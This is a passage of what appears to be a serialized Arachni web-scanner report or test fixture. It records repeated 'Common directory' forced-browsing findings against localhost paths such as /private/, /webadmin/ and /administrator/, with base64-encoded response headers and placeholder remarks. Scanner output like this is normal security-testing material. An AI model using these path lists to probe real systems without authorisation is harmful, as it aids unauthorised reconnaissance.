!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/intranet/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/intranet/
injected: intranet
id: intranet
elem: path
remarks: {}
method: ''
response: intranet
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/tree/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/tree/
injected: tree
id: tree
elem: path
remarks: {}
method: ''
response: tree
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/pages/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/pages/
injected: pages
id: pages
elem: path
remarks: {}
method: ''
response: pages
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/inventory/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/inventory/
injected: inventory
id: inventory
elem: path
remarks: {}
method: ''
response: inventory
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/private/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/private/
injected: private
id: private
elem: path
remarks: {}
method: ''
response: private
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/webadmin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/webadmin/
injected: webadmin
id: webadmin
elem: path
remarks: {}
method: ''
response: webadmin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/accounting/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/accounting/
injected: accounting
id: accounting
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: accounting
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/shop/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/shop/
injected: shop
id: shop
elem: path
remarks: {}
method: ''
response: shop
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/employees/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/employees/
injected: employees
id: employees
elem: path
remarks: {}
method: ''
response: employees
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/fpadmin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/fpadmin/
injected: fpadmin
id: fpadmin
elem: path
remarks: {}
method: ''
response: fpadmin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/administrator/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/administrator/
injected: administrator
id: administrator
elem: path
remarks: {}
method: ''
response: administrator
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/access/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/access/
injected: access
id: access
elem: path
remarks: {}
method: ''
response: access
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/library/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/library/
injected: library
id: library
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: library
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/database/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/database/
injected: database
id: database
elem: path
remarks: {}
method: ''
response: database
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/html/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/html/
injected: html
id: html
elem: path
remarks: {}
method: ''
response: html
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
